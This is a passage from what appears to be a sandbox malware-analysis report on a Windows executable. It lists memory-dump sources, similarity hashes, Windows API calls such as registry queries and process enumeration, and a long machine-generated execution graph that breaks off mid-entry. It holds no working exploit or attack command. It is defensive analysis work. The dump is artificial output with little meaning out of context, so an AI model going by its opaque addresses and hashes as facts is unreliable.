                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                        • API String ID: 3509786178-2769509956
                                                        • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                        • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                        • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                        • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                        • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                        • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                        • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                        • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                        Execution Graph

                                                        Execution Coverage:4.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:1.9%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:73
                                                        execution_graph 97715 9d107d 97720 9e2fc5 97715->97720 97717 9d108c 97751 9f2f70 97717->97751 97721 9e2fd5 __write_nolock 97720->97721 97754 9e1207 97721->97754 97725 9e3094 97766 9f08c1 97725->97766 97732 9e1207 59 API calls 97733 9e30c5 97732->97733 97785 9e19e1 97733->97785 97735 9e30ce RegOpenKeyExW 97736 a201a3 RegQueryValueExW 97735->97736 97737 9e30f0 Mailbox 97735->97737 97738 a201c0 97736->97738 97739 a20235 RegCloseKey 97736->97739 97737->97717 97789 9f0fe6 97738->97789 97739->97737 97750 a20247 _wcscat Mailbox __NMSG_WRITE 97739->97750 97741 a201d9 97799 9e433f 97741->97799 97744 a20201 97802 9e1821 97744->97802 97746 9e1609 59 API calls 97746->97750 97747 a2021b 97747->97739 97749 9e4c94 59 API calls 97749->97750 97750->97737 97750->97746 97750->97749 97811 9e1a36 97750->97811 97876 9f2e74 97751->97876 97753 9d1096 97755 9f0fe6 Mailbox 59 API calls 97754->97755 97756 9e1228 97755->97756 97757 9f0fe6 Mailbox 59 API calls 97756->97757 97758 9e1236 97757->97758 97759 9f00cf 97758->97759 97815 a01b70 97759->97815 97762 9e1a36 59 API calls 97763 9f0102 97762->97763 97817 9f0284 97763->97817 97765 9f010c Mailbox 97765->97725 97767 a01b70 __write_nolock 97766->97767 97768 9f08ce GetFullPathNameW 97767->97768 97769 9f08f0 97768->97769 97770 9e1821 59 API calls 97769->97770 97771 9e309f 97770->97771 97772 9e1900 97771->97772 97773 a1f534 97772->97773 97774 9e1914 97772->97774 97844 9e1c7e 97773->97844 97839 9e18a5 97774->97839 97777 9e191f 97779 9e4c94 97777->97779 97778 a1f53f __NMSG_WRITE _memmove 97780 9e4ca2 97779->97780 97784 9e4cc4 _memmove 97779->97784 97783 9f0fe6 Mailbox 59 API calls 97780->97783 97781 9f0fe6 Mailbox 59 API calls 97782 9e30bc 97781->97782 97782->97732 97783->97784 97784->97781 97786 9e19fb 97785->97786 97788 9e19ee 97785->97788 97787 9f0fe6 Mailbox 59 API calls 97786->97787 97787->97788 97788->97735 97791 9f0fee 97789->97791 97792 9f1008 97791->97792 97794 9f100c std::exception::exception 97791->97794 97847 9f593c 97791->97847 97864 9f35d1 DecodePointer 97791->97864 97792->97741 97865 9f87cb RaiseException 97794->97865 97796 9f1036 97866 9f8701 58 API calls _free 97796->97866 97798 9f1048 97798->97741 97800 9f0fe6 Mailbox 59 API calls 97799->97800 97801 9e4351 RegQueryValueExW 97800->97801 97801->97744 97801->97747 97803 9e182d __NMSG_WRITE 97802->97803 97804 9e189a 97802->97804 97806 9e1868 97803->97806 97807 9e1843 97803->97807 97805 9e1981 59 API calls 97804->97805 97810 9e184b _memmove 97805->97810 97808 9e1c7e 59 API calls 97806->97808 97875 9e1b7c 59 API calls Mailbox 97807->97875 97808->97810 97810->97747 97812 9e1a45 __NMSG_WRITE _memmove 97811->97812 97813 9f0fe6 Mailbox 59 API calls 97812->97813 97814 9e1a83 97813->97814 97814->97750 97816 9f00dc GetModuleFileNameW 97815->97816 97816->97762 97818 a01b70 __write_nolock 97817->97818 97819 9f0291 GetFullPathNameW 97818->97819 97820 9f02cd 97819->97820 97821 9f02b0 97819->97821 97823 9e19e1 59 API calls 97820->97823 97822 9e1821 59 API calls 97821->97822 97824 9f02bc 97822->97824 97823->97824 97827 9e133d 97824->97827 97828 9e134b 97827->97828 97831 9e1981 97828->97831 97830 9e135b 97830->97765 97832 9e1998 _memmove 97831->97832 97833 9e198f 97831->97833 97832->97830 97833->97832 97835 9e1aa4 97833->97835 97836 9e1ab7 97835->97836 97837 9e1ab4 _memmove 97835->97837 97838 9f0fe6 Mailbox 59 API calls 97836->97838 97837->97832 97838->97837 97840 9e18b4 __NMSG_WRITE 97839->97840 97841 9e1c7e 59 API calls 97840->97841 97842 9e18c5 _memmove 97840->97842 97843 a1f4f1 _memmove 97841->97843 97842->97777 97845 9f0fe6 Mailbox 59 API calls 97844->97845 97846 9e1c88 97845->97846 97846->97778 97848 9f59b7 97847->97848 97856 9f5948 97847->97856 97873 9f35d1 DecodePointer 97848->97873 97850 9f59bd 97874 9f8d58 58 API calls __getptd_noexit 97850->97874 97853 9f597b RtlAllocateHeap 97853->97856 97863 9f59af 97853->97863 97855 9f5953 97855->97856 97867 9fa39b 58 API calls 2 library calls 97855->97867 97868 9fa3f8 58 API calls 6 library calls 97855->97868 97869 9f32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97855->97869 97856->97853 97856->97855 97857 9f59a3 97856->97857 97861 9f59a1 97856->97861 97870 9f35d1 DecodePointer 97856->97870 97871 9f8d58 58 API calls __getptd_noexit 97857->97871 97872 9f8d58 58 API calls __getptd_noexit 97861->97872 97863->97791 97864->97791 97865->97796 97866->97798 97867->97855 97868->97855 97870->97856 97871->97861 97872->97863 97873->97850 97874->97863 97875->97810 97877 9f2e80 __write 97876->97877 97884 9f3447 97877->97884 97883 9f2ea7 __write 97883->97753 97901 9f9e3b 97884->97901 97886 9f2e89 97887 9f2eb8 DecodePointer DecodePointer 97886->97887 97888 9f2e95 97887->97888 97889 9f2ee5 97887->97889 97898 9f2eb2 97888->97898 97889->97888 97947 9f89d4 59 API calls __strnicoll_l 97889->97947 97891 9f2f48 EncodePointer EncodePointer 97891->97888 97892 9f2ef7 97892->97891 97893 9f2f1c 97892->97893 97948 9f8a94 61 API calls 2 library calls 97892->97948 97893->97888 97896 9f2f36 EncodePointer 97893->97896 97949 9f8a94 61 API calls 2 library calls 97893->97949 97896->97891 97897 9f2f30 97897->97888 97897->97896 97950 9f3450 97898->97950 97902 9f9e5f EnterCriticalSection 97901->97902 97903 9f9e4c 97901->97903 97902->97886 97908 9f9ec3 97903->97908 97905 9f9e52 97905->97902 97932 9f32e5 58 API calls 3 library calls 97905->97932 97909 9f9ecf __write 97908->97909 97910 9f9ed8 97909->97910 97911 9f9ef0 97909->97911 97933 9fa39b 58 API calls 2 library calls 97910->97933 97914 9f9f11 __write 97911->97914 97936 9f8a4d 58 API calls 2 library calls 97911->97936 97914->97905 97915 9f9edd 97934 9fa3f8 58 API calls 6 library calls 97915->97934 97916 9f9f05 97918 9f9f0c 97916->97918 97919 9f9f1b 97916->97919 97937 9f8d58 58 API calls __getptd_noexit 97918->97937 97922 9f9e3b __lock 58 API calls 97919->97922 97920 9f9ee4 97935 9f32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97920->97935 97924 9f9f22 97922->97924 97926 9f9f2f 97924->97926 97927 9f9f47 97924->97927 97938 9fa05b InitializeCriticalSectionAndSpinCount 97926->97938 97939 9f2f85 97927->97939 97930 9f9f3b 97945 9f9f63 LeaveCriticalSection _doexit 97930->97945 97933->97915 97934->97920 97936->97916 97937->97914 97938->97930 97940 9f2f8e RtlFreeHeap 97939->97940 97944 9f2fb7 __dosmaperr 97939->97944 97941 9f2fa3 97940->97941 97940->97944 97946 9f8d58 58 API calls __getptd_noexit 97941->97946 97943 9f2fa9 GetLastError 97943->97944 97944->97930 97945->97914 97946->97943 97947->97892 97948->97893 97949->97897 97953 9f9fa5 LeaveCriticalSection 97950->97953 97952 9f2eb7 97952->97883 97953->97952 97954 a0e463 97966 9d373a 97954->97966 97956 a0e479 97957 a0e4fa 97956->97957 97958 a0e48f 97956->97958 97975 9db020 97957->97975 98017 9d5376 60 API calls 97958->98017 97962 a0e4ee Mailbox 97964 a0f046 Mailbox 97962->97964 98019 a3a48d 89 API calls 4 library calls 97962->98019 97963 a0e4ce 97963->97962 98018 a3890a 59 API calls Mailbox 97963->98018 97967 9d3758 97966->97967 97968 9d3746 97966->97968 97970 9d375e 97967->97970 97971 9d3787 97967->97971 98020 9d523c 97968->98020 97972 9f0fe6 Mailbox 59 API calls 97970->97972 97973 9d523c 59 API calls 97971->97973 97974 9d3750 97972->97974 97973->97974 97974->97956 98032 9e3740 97975->98032 97977 a130b6 98143 a3a48d 89 API calls 4 library calls 97977->98143 97979 9db07f 97979->97977 97981 a130d4 97979->97981 98001 9dbb86 97979->98001 98013 9db132 Mailbox _memmove 97979->98013 98144 a3a48d 89 API calls 4 library calls 97981->98144 97983 a1355e 98016 9db4dd 97983->98016 98187 a3a48d 89 API calls 4 library calls 97983->98187 97984 a1318a 97984->98016 98146 a3a48d 89 API calls 4 library calls 97984->98146 97989 a13106 97989->97984 98145 9da9de 433 API calls 97989->98145 97992 a2730a 59 API calls 97992->98013 97993 9d3b31 59 API calls 97993->98013 97996 9d53b0 433 API calls 97996->98013 97997 a13418 98153 9d53b0 97997->98153 98000 a13448 98000->98016 98181 9d39be 98000->98181 98142 a3a48d 89 API calls 4 library calls 98001->98142 98004 9d3c30 68 API calls 98004->98013 98005 a131c3 98147 a3a48d 89 API calls 4 library calls 98005->98147 98007 a1346f 98185 a3a48d 89 API calls 4 library calls 98007->98185 98011 9e1c9c 59 API calls 98011->98013 98012 9d523c 59 API calls 98012->98013 98013->97983 98013->97989 98013->97992 98013->97993 98013->97996 98013->97997 98013->98001 98013->98004 98013->98005 98013->98007 98013->98011 98013->98012 98014 9f0fe6 59 API calls Mailbox 98013->98014 98013->98016 98037 9d3add 98013->98037 98044 9dbc70 98013->98044 98126 9d3a40 98013->98126 98137 9d5190 98013->98137 98148 a26c62 59 API calls 2 library calls 98013->98148 98149 a4a9c3 85 API calls Mailbox 98013->98149 98150 a26c1e 59 API calls Mailbox 98013->98150 98151 a35ef2 68 API calls 98013->98151 98152 9d3ea3 68 API calls Mailbox 98013->98152 98186 a3a12a 59 API calls 98013->98186 98014->98013 98016->97962 98017->97963 98018->97962 98019->97964 98021 9d524a 98020->98021 98022 9d5250 98020->98022 98021->98022 98024 9e1c9c 98021->98024 98022->97974 98025 9e1caf 98024->98025 98026 9e1ca7 98024->98026 98025->98022 98028 9e1bcc 98026->98028 98029 9e1bef _memmove 98028->98029 98030 9e1bdc 98028->98030 98029->98025 98030->98029 98031 9f0fe6 Mailbox 59 API calls 98030->98031 98031->98029 98033 9e374f 98032->98033 98036 9e376a 98032->98036 98034 9e1aa4 59 API calls 98033->98034 98035 9e3757 CharUpperBuffW 98034->98035 98035->98036 98036->97979 98038 9d3aee 98037->98038 98039 a0d3cd 98037->98039 98040 9f0fe6 Mailbox 59 API calls 98038->98040 98042 9d3af5 98040->98042 98041 9d3b16 98041->98013 98042->98041 98188 9d3ba5 59 API calls Mailbox 98042->98188 98045 a1359f 98044->98045 98056 9dbc95 98044->98056 98309 a3a48d 89 API calls 4 library calls 98045->98309 98047 9dbf3b 98047->98013 98051 9dc2b6 98051->98047 98052 9dc2c3 98051->98052 98307 9dc483 433 API calls Mailbox 98052->98307 98055 9dc2ca LockWindowUpdate DestroyWindow GetMessageW 98055->98047 98057 9dc2fc 98055->98057 98118 9dbca5 Mailbox 98056->98118 98310 9d5376 60 API calls 98056->98310 98311 a2700c 433 API calls 98056->98311 98059 a14509 TranslateMessage DispatchMessageW GetMessageW 98057->98059 98058 a136b3 Sleep 98058->98118 98059->98059 98060 a14539 98059->98060 98060->98047 98061 9dbf54 timeGetTime 98061->98118 98063 a1405d WaitForSingleObject 98064 a1407d GetExitCodeProcess CloseHandle 98063->98064 98063->98118 98068 9dc36b 98064->98068 98065 9e1c9c 59 API calls 98065->98118 98066 9e1207 59 API calls 98101 9dc1fa Mailbox 98066->98101 98067 9dc210 Sleep 98067->98101 98068->98013 98069 9f0fe6 59 API calls Mailbox 98069->98118 98071 a143a9 Sleep 98071->98101 98072 9f0859 timeGetTime 98072->98101 98073 9d6cd8 411 API calls 98073->98118 98075 9dc324 timeGetTime 98308 9d5376 60 API calls 98075->98308 98079 a14440 GetExitCodeProcess 98084 a14456 WaitForSingleObject 98079->98084 98085 a1446c CloseHandle 98079->98085 98080 a56562 110 API calls 98080->98101 98082 9d6d79 109 API calls 98082->98118 98084->98085 98084->98118 98085->98101 98086 a138aa Sleep 98086->98118 98087 a144c8 Sleep 98087->98118 98089 9e1a36 59 API calls 98089->98101 98091 9d5376 60 API calls 98091->98118 98095 9d53b0 411 API calls 98095->98118 98097 9dc26d 98100 9e1a36 59 API calls 98097->98100 98098 9db020 411 API calls 98098->98118 98103 9dbf25 Mailbox 98100->98103 98101->98066 98101->98067 98101->98068 98101->98072 98101->98079 98101->98080 98101->98086 98101->98087 98101->98089 98101->98118 98335 a32baf 60 API calls 98101->98335 98336 9d5376 60 API calls 98101->98336 98337 9d3ea3 68 API calls Mailbox 98101->98337 98338 9d6cd8 433 API calls 98101->98338 98379 a270e2 59 API calls 98101->98379 98380 a357ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98101->98380 98381 a34148 CreateToolhelp32Snapshot Process32FirstW 98101->98381 98103->98047 98306 9dc460 10 API calls Mailbox 98103->98306 98104 9e1a36 59 API calls 98104->98118 98107 9d5190 59 API calls Mailbox 98107->98118 98108 9d3a40 59 API calls 98108->98118 98109 9d39be 68 API calls 98109->98118 98110 a3a48d 89 API calls 98110->98118 98111 a13e13 VariantClear 98111->98118 98112 a26cf1 59 API calls Mailbox 98112->98118 98113 a13ea9 VariantClear 98113->98118 98114 a27aad 59 API calls 98114->98118 98115 a13c57 VariantClear 98115->98118 98116 9d41c4 59 API calls Mailbox 98116->98118 98117 9d3ea3 68 API calls 98117->98118 98118->98058 98118->98061 98118->98063 98118->98065 98118->98067 98118->98068 98118->98069 98118->98071 98118->98073 98118->98075 98118->98082 98118->98091 98118->98095 98118->98097 98118->98098 98118->98101 98118->98103 98118->98104 98118->98107 98118->98108 98118->98109 98118->98110 98118->98111 98118->98112 98118->98113 98118->98114 98118->98115 98118->98116 98118->98117 98189 9d52b0 98118->98189 98198 9d9a00 98118->98198 98205 9d9c80 98118->98205 98236 9da820 98118->98236 98253 9e42cf 98118->98253 98257 a3e4a0 98118->98257 98260 a4e60c 98118->98260 98263 a3bcd6 98118->98263 98293 a3412a 98118->98293 98296 a4f93c 98118->98296 98299 a3c270 98118->98299 98312 a56655 59 API calls 98118->98312 98313 a3a058 59 API calls Mailbox 98118->98313 98314 a2e0aa 59 API calls 98118->98314 98315 9d4d37 98118->98315 98333 a26c62 59 API calls 2 library calls 98118->98333 98334 9d38ff 59 API calls 98118->98334 98339 a4c355 98118->98339 98127 a0d3b1 98126->98127 98130 9d3a53 98126->98130 98128 a0d3c1 98127->98128 99221 a26d17 59 API calls 98127->99221 98131 9d3a7d 98130->98131 98132 9d3b31 59 API calls 98130->98132 98136 9d3a9a Mailbox 98130->98136 98133 9d3a83 98131->98133 99213 9d3b31 98131->99213 98132->98131 98135 9d5190 Mailbox 59 API calls 98133->98135 98133->98136 98135->98136 98136->98013 98139 9d519b 98137->98139 98138 9d51d2 98138->98013 98139->98138 99222 9d41c4 59 API calls Mailbox 98139->99222 98141 9d51fd 98141->98013 98142->97977 98143->98016 98144->98016 98145->97984 98146->98016 98147->98016 98148->98013 98149->98013 98150->98013 98151->98013 98152->98013 98154 9d53cf 98153->98154 98177 9d53fd Mailbox 98153->98177 98155 9f0fe6 Mailbox 59 API calls 98154->98155 98155->98177 98156 9d69fa 98157 9e1c9c 59 API calls 98156->98157 98176 9d5569 Mailbox 98157->98176 98158 a27aad 59 API calls 98158->98177 98159 9d69ff 98160 a0e691 98159->98160 98161 a0f165 98159->98161 99241 a3a48d 89 API calls 4 library calls 98160->99241 99245 a3a48d 89 API calls 4 library calls 98161->99245 98165 9f0fe6 59 API calls Mailbox 98165->98177 98166 a0e6a0 98166->98000 98167 9e1c9c 59 API calls 98167->98177 98169 a0ea9a 98172 9e1c9c 59 API calls 98169->98172 98170 9e1207 59 API calls 98170->98177 98172->98176 98173 a0eb67 98173->98176 99242 a27aad 59 API calls 98173->99242 98174 9f2f70 67 API calls __cinit 98174->98177 98176->98000 98177->98156 98177->98158 98177->98159 98177->98160 98177->98165 98177->98167 98177->98169 98177->98170 98177->98173 98177->98174 98177->98176 98178 a0ef28 98177->98178 98180 9d5a1a 98177->98180 99223 9d6e30 98177->99223 99240 9d7e50 433 API calls 2 library calls 98177->99240 99243 a3a48d 89 API calls 4 library calls 98178->99243 99244 a3a48d 89 API calls 4 library calls 98180->99244 98182 9d39c9 98181->98182 98184 9d39f0 98182->98184 99251 9d3ea3 68 API calls Mailbox 98182->99251 98184->98007 98185->98016 98186->98013 98187->98016 98188->98041 98190 9d52c6 98189->98190 98194 9d5313 98189->98194 98191 9d52d3 PeekMessageW 98190->98191 98190->98194 98192 9d52ec 98191->98192 98191->98194 98192->98118 98194->98192 98195 a0df68 TranslateAcceleratorW 98194->98195 98196 9d533e PeekMessageW 98194->98196 98197 9d5352 TranslateMessage DispatchMessageW 98194->98197 98391 9d359e 98194->98391 98195->98194 98195->98196 98196->98192 98196->98194 98197->98196 98199 9d9a1d 98198->98199 98200 9d9a31 98198->98200 98396 9d94e0 98199->98396 98430 a3a48d 89 API calls 4 library calls 98200->98430 98203 9d9a28 98203->98118 98204 a12478 98204->98204 98206 9d9cb5 98205->98206 98207 a1247d 98206->98207 98209 9d9d1f 98206->98209 98219 9d9d79 98206->98219 98208 9d53b0 433 API calls 98207->98208 98210 a12492 98208->98210 98212 9e1207 59 API calls 98209->98212 98209->98219 98235 9d9f50 Mailbox 98210->98235 98438 a3a48d 89 API calls 4 library calls 98210->98438 98211 9e1207 59 API calls 98211->98219 98214 a124d8 98212->98214 98216 9f2f70 __cinit 67 API calls 98214->98216 98215 9f2f70 __cinit 67 API calls 98215->98219 98216->98219 98217 a124fa 98217->98118 98218 9d39be 68 API calls 98218->98235 98219->98211 98219->98215 98219->98217 98221 9d9f3a 98219->98221 98219->98235 98221->98235 98439 a3a48d 89 API calls 4 library calls 98221->98439 98222 9d4230 59 API calls 98222->98235 98223 9da775 98443 a3a48d 89 API calls 4 library calls 98223->98443 98224 9d53b0 433 API calls 98224->98235 98227 9d5190 Mailbox 59 API calls 98227->98235 98228 a127f9 98228->98118 98230 a3a48d 89 API calls 98230->98235 98232 9e1bcc 59 API calls 98232->98235 98234 9da058 98234->98118 98235->98218 98235->98222 98235->98223 98235->98224 98235->98227 98235->98230 98235->98232 98235->98234 98440 a27aad 59 API calls 98235->98440 98441 a4ccac 433 API calls 98235->98441 98442 a4bc26 433 API calls Mailbox 98235->98442 98444 a49ab0 433 API calls Mailbox 98235->98444 98237 a12d51 98236->98237 98240 9da84c 98236->98240 98446 a3a48d 89 API calls 4 library calls 98237->98446 98239 a12d62 98239->98118 98241 a12d6a 98240->98241 98250 9da888 _memmove 98240->98250 98447 a3a48d 89 API calls 4 library calls 98241->98447 98244 9f0fe6 59 API calls Mailbox 98244->98250 98245 a12dae 98448 9da9de 433 API calls 98245->98448 98247 9d53b0 433 API calls 98247->98250 98248 a12dc8 98249 9da975 98248->98249 98449 a3a48d 89 API calls 4 library calls 98248->98449 98249->98118 98250->98244 98250->98245 98250->98247 98250->98248 98250->98249 98251 9da962 98250->98251 98251->98249 98445 a4a9c3 85 API calls Mailbox 98251->98445 98254 9e42e8 98253->98254 98255 9e42d9 98253->98255 98254->98255 98256 9e42ed FindCloseChangeNotification 98254->98256 98255->98118 98256->98255 98450 a3f87d 98257->98450 98259 a3e4b0 98259->98118 98586 a4d1c6 98260->98586 98262 a4e61c 98262->98118 98264 a3bcf5 98263->98264 98291 a3bdbb Mailbox 98263->98291 98717 9d502b 98264->98717 98266 9d4d37 84 API calls 98268 a3bdf3 98266->98268 98267 a3bd00 98270 9d502b 59 API calls 98267->98270 98269 9d4d37 84 API calls 98268->98269 98271 a3be05 98269->98271 98272 a3bd14 98270->98272 98793 a33ce2 98271->98793 98274 9e1207 59 API calls 98272->98274 98272->98291 98275 a3bd25 98274->98275 98276 9e1207 59 API calls 98275->98276 98277 a3bd2e 98276->98277 98278 9d4d37 84 API calls 98277->98278 98279 a3bd3b 98278->98279 98721 9f0119 98279->98721 98281 a3bd4e 98772 9e17e0 98281->98772 98284 a3412a 3 API calls 98286 a3bd6e 98284->98286 98285 9d502b 59 API calls 98285->98291 98288 9e1a36 59 API calls 98286->98288 98292 a3bd88 Mailbox 98286->98292 98287 a3bdc3 Mailbox 98287->98118 98289 a3bd7f 98288->98289 98781 a33f1d 98289->98781 98291->98266 98291->98287 98292->98285 98923 a3494a GetFileAttributesW 98293->98923 98927 a4fd7d 98296->98927 98300 9d4d37 84 API calls 98299->98300 98301 a3c286 98300->98301 99035 a34005 98301->99035 98303 a3c28e 98304 a3c292 GetLastError 98303->98304 98305 a3c2a7 98303->98305 98304->98305 98305->98118 98306->98051 98307->98055 98308->98118 98309->98056 98310->98056 98311->98056 98312->98118 98313->98118 98314->98118 98316 9d4d51 98315->98316 98324 9d4d4b 98315->98324 98317 a0db28 __i64tow 98316->98317 98318 9d4d99 98316->98318 98319 a0da2f 98316->98319 98321 9d4d57 __itow 98316->98321 99060 9f38c8 83 API calls 3 library calls 98318->99060 98326 9f0fe6 Mailbox 59 API calls 98319->98326 98331 a0daa7 Mailbox _wcscpy 98319->98331 98323 9f0fe6 Mailbox 59 API calls 98321->98323 98325 9d4d71 98323->98325 98324->98118 98325->98324 98327 9e1a36 59 API calls 98325->98327 98328 a0da74 98326->98328 98327->98324 98329 9f0fe6 Mailbox 59 API calls 98328->98329 98330 a0da9a 98329->98330 98330->98331 98332 9e1a36 59 API calls 98330->98332 99061 9f38c8 83 API calls 3 library calls 98331->99061 98332->98331 98333->98118 98334->98118 98335->98101 98336->98101 98337->98101 98338->98101 98340 a4c380 98339->98340 98341 a4c39a 98339->98341 99089 a3a48d 89 API calls 4 library calls 98340->99089 99062 a4a8fd 98341->99062 98345 9d53b0 432 API calls 98346 a4c406 98345->98346 98347 a4c498 98346->98347 98351 a4c447 98346->98351 98372 a4c392 Mailbox 98346->98372 98348 a4c4ee 98347->98348 98349 a4c49e 98347->98349 98350 9d4d37 84 API calls 98348->98350 98348->98372 99090 a37ed5 59 API calls 98349->99090 98352 a4c500 98350->98352 98356 a3789a 59 API calls 98351->98356 98354 9e1aa4 59 API calls 98352->98354 98357 a4c524 CharUpperBuffW 98354->98357 98355 a4c4c1 99091 9e35b9 59 API calls Mailbox 98355->99091 98359 a4c477 98356->98359 98362 a4c53e 98357->98362 98361 a26ebc 432 API calls 98359->98361 98360 a4c4c9 Mailbox 98366 9db020 432 API calls 98360->98366 98361->98372 98363 a4c545 98362->98363 98364 a4c591 98362->98364 99069 a3789a 98363->99069 98365 9d4d37 84 API calls 98364->98365 98367 a4c599 98365->98367 98366->98372 99092 9d5376 60 API calls 98367->99092 98372->98118 98373 a4c5a3 98373->98372 98374 9d4d37 84 API calls 98373->98374 98375 a4c5be 98374->98375 99093 9e35b9 59 API calls Mailbox 98375->99093 98377 a4c5ce 98378 9db020 432 API calls 98377->98378 98378->98372 98379->98101 98380->98101 99205 a34ce2 98381->99205 98383 a34195 Process32NextW 98384 a34244 FindCloseChangeNotification 98383->98384 98389 a3418e Mailbox 98383->98389 98384->98101 98385 9e1207 59 API calls 98385->98389 98386 9e1a36 59 API calls 98386->98389 98387 9f0119 59 API calls 98387->98389 98388 9e17e0 59 API calls 98388->98389 98389->98383 98389->98384 98389->98385 98389->98386 98389->98387 98389->98388 98390 9e151f 61 API calls 98389->98390 98390->98389 98392 9d35e2 98391->98392 98394 9d35b0 98391->98394 98392->98194 98393 9d35d5 IsDialogMessageW 98393->98392 98393->98394 98394->98392 98394->98393 98395 a0d273 GetClassLongW 98394->98395 98395->98393 98395->98394 98397 9d53b0 433 API calls 98396->98397 98398 9d951f 98397->98398 98399 a12001 98398->98399 98413 9d9527 _memmove 98398->98413 98400 9d5190 Mailbox 59 API calls 98399->98400 98405 9d9944 98400->98405 98401 a122c0 98437 a3a48d 89 API calls 4 library calls 98401->98437 98403 a122de 98403->98403 98404 9d9583 98404->98203 98408 9f0fe6 Mailbox 59 API calls 98405->98408 98406 9d986a 98409 a122b1 98406->98409 98410 9d987f 98406->98410 98407 9f0fe6 59 API calls Mailbox 98407->98413 98421 9d96e3 _memmove 98408->98421 98436 a4a983 59 API calls 98409->98436 98412 9f0fe6 Mailbox 59 API calls 98410->98412 98423 9d977d 98412->98423 98413->98401 98413->98404 98413->98405 98413->98407 98414 9d96cf 98413->98414 98428 9d9741 98413->98428 98414->98405 98416 9d96dc 98414->98416 98415 9f0fe6 Mailbox 59 API calls 98419 9d970e 98415->98419 98418 9f0fe6 Mailbox 59 API calls 98416->98418 98417 a122a0 98435 a3a48d 89 API calls 4 library calls 98417->98435 98418->98421 98419->98428 98431 9dcca0 433 API calls 98419->98431 98421->98415 98421->98419 98421->98428 98423->98203 98425 a12278 98434 a3a48d 89 API calls 4 library calls 98425->98434 98427 a12253 98433 a3a48d 89 API calls 4 library calls 98427->98433 98428->98406 98428->98417 98428->98423 98428->98425 98428->98427 98432 9d8180 433 API calls 98428->98432 98430->98204 98431->98428 98432->98428 98433->98423 98434->98423 98435->98423 98436->98401 98437->98403 98438->98235 98439->98235 98440->98235 98441->98235 98442->98235 98443->98228 98444->98235 98445->98249 98446->98239 98447->98249 98448->98248 98449->98249 98451 a3f8f2 98450->98451 98452 a3f898 98450->98452 98526 a3fbb7 59 API calls 98451->98526 98454 9f0fe6 Mailbox 59 API calls 98452->98454 98456 a3f89f 98454->98456 98455 a3f8ff 98458 a3f8d9 98455->98458 98461 a3f9cb 98455->98461 98467 a3f93f 98455->98467 98457 a3f8ab 98456->98457 98513 9e3df7 60 API calls Mailbox 98456->98513 98460 9d4d37 84 API calls 98457->98460 98458->98259 98463 a3f8bd 98460->98463 98506 a38cd0 98461->98506 98514 9e3e47 98463->98514 98464 a3f9d2 98510 a3394d 98464->98510 98469 9d4d37 84 API calls 98467->98469 98468 a3f8cd 98468->98458 98525 9e3f0b FindCloseChangeNotification 98468->98525 98476 a3f946 98469->98476 98472 a3f9c1 98487 a3399c 98472->98487 98474 a3f97a 98527 